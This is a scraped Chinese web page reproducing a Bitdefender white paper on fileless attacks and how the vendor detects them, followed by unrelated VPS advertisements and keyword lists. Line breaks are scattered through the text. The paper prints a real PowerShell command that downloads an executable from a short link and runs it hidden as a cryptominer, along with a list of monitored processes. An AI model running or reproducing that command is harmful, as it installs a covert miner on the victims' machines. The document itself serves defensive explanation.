攻击cmd病毒

cmd病毒  时间:2021-05-23  阅读:()

无文件攻击-白皮书无文件攻击黑客越来越多地转向无文件攻击,因为它们比基于文件的攻击成功的可能性高10倍.
这些无文件感染证明了网络犯罪分子的足智多谋和创造力.
无文件攻击-白皮书什么是无文件攻击无文件攻击(也称为零占用或宏攻击)与传统恶意软件的不同之处在于,它不需要安装恶意软件来感染受害者的计算机.
相反,它利用了计算机上的现有漏洞.
它存在于计算机的内存中,并使用常见的系统工具通过将恶意代码注入正常安全且受信任的进程(如javaw.
exe和iexplore.
exe)来执行攻击.
这些攻击可以在不下载任何恶意文件的情况下控制计算机,因此得名.
无文件攻击也被称为基于内存的攻击或"外部"的攻击.
攻击者可以利用最终用户每天使用的易受攻击的软件来渗透和入侵.
为什么网络犯罪分子会使用无文件攻击黑客越来越多地转向无文件攻击,因为他们成功的可能性是基于文件的攻击的10倍.
这些无文件感染证明了网络犯罪分子的足智多谋和创造力.
在他们的攻击中,黑客的目标是:隐身-尽可能避免被安全产品检测到的能力.
权限提升-利用漏洞的能力,使其能够对系统进行管理访问,以便他们可以随心所欲地执行任何操作.
信息收集-尽可能多地收集有关受害者和受害者计算机的数据,以便以后用于其他攻击.
持久性-能够在最长的时间内将恶意软件保留在系统中,未被发现.
[2]1.
2.
用户收到带有恶意网站链接的垃圾邮件6.
用户点击链接PowerShell脚本定位并将用户的数据发送给攻击者3.
5.
恶意网站在用户的计算机上加载具有已知Flash漏洞4.
>_PowerShell从命令和控制服务器下载并执行脚本Flash将打开WindowsPowerShell工具,该工具可以在内存中运行时通过命令行执行指令无文件攻击-白皮书无文件攻击如何工作无文件攻击就像大多数其他网络攻击一样开始.
网络犯罪分子试图访问计算机系统.
他们可能会尝试在未修补的软件中利用安全漏洞,或尝试使用爆破攻击来破解服务帐户的密码.
一种更常见的技术是发送网络钓鱼电子邮件,试图欺骗人们点击恶意链接或打开恶意,例如包含宏的MicrosoftWord文档.
一旦黑客获得访问权限,他们就会直接从计算机的内存中运行命令或恶意软件.
他们经常利用内置的系统管理工具(如WindowsPowerShell或计划任务)来运行命令和恶意软件.
有四种主要攻击类别:仅限内存的威胁.
这些威胁利用Windows服务中的漏洞直接在内存中执行其payload.
重新启动受仅内存威胁感染的系统会清除掉病毒.
无文件持久性攻击.
在这些攻击中,即使恶意payload未加载到硬盘上,即使系统重新启动,感染仍然存在.
两用工具攻击.
攻击者使用合法的Windows系统工具和应用程序,但出于恶意目的,例如获取目标系统的凭据或将数据发送回给他们.
非可移植可执行(PE)文件攻击.
这是一种涉及脚本和合法工具的两用工具攻击.
这些攻击经常使用PowerShell,WScript或CScript.
历史记录无文件恶意软件感染于2014年8月出现,当时PoweliksTrojan首次亮相.
它最初设计用于执行点击欺诈,但它演变成基于注册表的威胁.
该标本通过利用MicrosoftWord漏洞进入系统.
它使用PowerShell和JavaScript以及shellcode来快速启动其内存执行.
另一个在2015年引起关注的无文件恶意软件标本是Kovter.
在那个化身中,Kovter的感染技术与Poweliks的感染技术非常相似.
即使在使用恶意Windows可执行文件启动感染时,样本也会在注册表中存储模糊或加密的工件后删除该文件.
至少有一个变体通过使用执行JavaScript的快捷方式文件来维持持久性.
此脚本启动PowerShell并执行shellcode,以便在向其中注入恶意代码后启动非恶意应用程序.
在2016年中期,PowerSniff感染始于带有恶意宏的MicrosoftWord文档.
该标本的内存机制类似于Kovter的某些方面,并涉及执行shellcode的PowerShell脚本,该脚本解码并执行额外的恶意负载,仅在内存中运行.
PowerSniff能够将恶意DLL临时保存到文件系统.
2017年初,另一个名为POSHSPY的复杂攻击使用操作系统的WindowsManagementInstrumentation(WMI)功能来维护持久性,并依靠PowerShell来实现其有效负载.
该样本能够下载可执行文件,并将其保存到文件系统中.
Bitdefender如何保护您免受无文件攻击Bitdefender使用以下技术来检测无文件攻击:命令行监控我们正在监视已知用于执行无文件攻击的进程列表.
此列表包括诸如的进程autoit.
exe,bitsadmin.
exe,cscript.
exe,java.
exe,javaw.
exe,miprvse.
exe,net.
exe,netsh.
exe,powershell.
exe,powershell_ise.
exe,py.
exe,python.
exe,regedit.
exe,regsvr32.
exe,rundll32.
exe,schtasks.
exe,和wscript.
exe.
当在Bitdefender技术保护的机器上启动新进程时,将提取命令行并将其作为缓冲区发送到扫描引擎,使用有关原始进程路径和父进程的信息扩充扫描上下文.
在其他文件类型中找到的标识为命令(cmd)的缓冲区也会被扫描,如LNK,JOB,BAT和PS1.
[3]无文件攻击-白皮书缓冲区攻击示例:\Device\HarddiskVolume1\Windows\SysWOW64\WindowsPowerShell\v1.
0\powershell.
exe"-command"New-Item-ItemTypeDirectory-Force($env:APPDATA+\'\\FastCh\new-objectSystem.
Net.
WebClient).
DownloadFile(\'http://bit.
ly/2nzJcoP\',($env:APPDATA+\'\\FastCh\\CleanWork.
exe\Start-Process-WindowStylehidden$env:APPDATA\'\\FastCh\\CleanWork.
exe\'\'-of.
pooling.
cf:80--nicehash--max-cpu-usage=20--keepalive-B\'扫描流程1.
在少数情况下,执行一些特定的预处理.
例如,cmd.
exe进程忽略了(^)字符,因此它从命令行中删除.
2.
命令行分为单词/token,其中一个单词/token表示由空格或引号分隔的字符串.
3.
每个单词由一系列线性处理管道(tokenizer)处理:a)如果单词是Base64字符串,则标记生成器从头开始解码并处理字符串,因为它将成为命令行的一部分.
b)如果单词是引号中的字符串,则它从内到外作为单个单词处理一次,然后作为命令行的一部分处理.
c)如果当前单词以字符串X结束,或包含(视情况而定或优先选择)字符串X,则将它传递给下一阶段,这只能通过下一个字来克服.
4.
当单词到达最终状态时,设置一个标志,并且标记器进程从下一个单词开始.
5.
在扫描过程中,我们在每个受监视的过程中搜索单词或关键词序列.
6.
对于每个单词或单词序列,我们设置特定的标志,因为这些单词具有含义:从特定的过程参数到URL.
例如,EncodedCommand字是Powershell的参数.
7.
再一次,如果一个单词在Base64中被编码,它将被解码并且结果将被重新引入到过程算法中.
8.
启发式算法是根据从上述标记器中提取的标志构建的.
它们还可以与引用父进程的标志组合使用.
代码缓冲区在扫描文件较少的攻击时,我们还会关联其他Bitdefender技术的信息,例如:高级反漏洞检测到的内存缓冲区,遵循面向返回编程(ROP)等开发方法.
例如,包含在浏览器内存中的Flash沙箱外部执行的shellcode的缓冲区.
进程检测可以通过执行行为过程分析来检测前所未见的恶意软件.
对于无文件攻击,我们会查找进程检测检测到的可疑内存缓冲区,这是由于远程进程中的代码注入,以及在某些情况下,在同一源进程的内存中.
例如,我们扫描在漏洞利用框架中常用的meterpreterreverse-shell可执行文件的缓冲区,如MetaSploit.
Bitdefender是一家全球领先的安全技术公司,为150多个国家的5亿多用户提供尖端的端到端网络安全解决方案和高级威胁防护.
自2001年以来,Bitdefender一直致力于制作屡获殊荣的商业和消费者安全技术,并且是混合基础设施安全和端点保护的首选供应商.
通过研发,联盟和合作伙伴关系,Bitdefender值得信赖,领先并提供您可以信赖的强大安全性.
有关更多信息,请访问官方网站:http://www.
bitdefender-cn.
com.
AllRightsReserved.
2017Bitdefender.
Alltrademarks,tradenames,andproductsreferencedhereinarepropertyoftheirrespectiveowners.

Hostodo美国独立日优惠套餐年付13.99美元起,拉斯维加斯/迈阿密机房

Hostodo又发布了几款针对7月4日美国独立日的优惠套餐(Independence Day Super Sale),均为年付,基于KVM架构,采用NVMe硬盘,最低13.99美元起,可选拉斯维加斯或者迈阿密机房。这是一家成立于2014年的国外VPS主机商,主打低价VPS套餐且年付为主,基于OpenVZ和KVM架构,产品性能一般,支持使用PayPal或者支付宝等付款方式。商家客服响应也比较一般,推...

LOCVPS新上韩国KVM,全场8折,2G内存套餐月付44元起_网络传真服务器

LOCVPS(全球云)发布了新上韩国机房KVM架构主机信息,提供流量和带宽方式,适用全场8折优惠码,优惠码最低2G内存套餐月付仅44元起。这是一家成立较早的国人VPS服务商,目前提供洛杉矶MC、洛杉矶C3、和香港邦联、香港沙田电信、香港大埔、日本东京、日本大阪、新加坡、德国和荷兰等机房VPS主机,基于KVM或者XEN架构。下面分别列出几款韩国机房KVM主机配置信息。韩国KVM流量型套餐:KR-Pl...

hosteons:10Gbps带宽,免费Windows授权,自定义上传ISO,VPS低至$21/年,可选洛杉矶达拉斯纽约

hosteons当前对美国洛杉矶、达拉斯、纽约数据中心的VPS进行特别的促销活动:(1)免费从1Gbps升级到10Gbps带宽,(2)Free Blesta License授权,(3)Windows server 2019授权,要求从2G内存起,而且是年付。 官方网站:https://www.hosteons.com 使用优惠码:zhujicepingEDDB10G,可以获得: 免费升级10...

cmd病毒为你推荐
"2014年全国民营企业招聘会现场A区域企业信息",,,,计划ipadcss3圆角怎样用css实现圆角矩形?重庆宽带测速重庆电信测速我的网速溢出重庆宽带测速重庆云阳电信宽带测速网址谁知道,帮个忙?勒索病毒win7补丁win7有针对勒索病毒的补丁吗win10445端口win的22端口和23端口作用分别是什么 ?ipad上网为什么我的ipad 显示无法连接到网络tcpip上的netbiostcp 协议里的 netbios . 在哪,找不到重庆电信网速测试如何测量网速
godaddy域名解析教程 naning9韩国官网 国内免备案主机 justhost simcentric 息壤备案 百度云100as 免备案空间 主机屋免费空间 贵州电信宽带测速 java虚拟主机 ftp免费空间 drupal安装 dnspod 畅行云 阿里云邮箱登陆地址 测速电信 阿里云邮箱个人版 hosting24 赵蓉 更多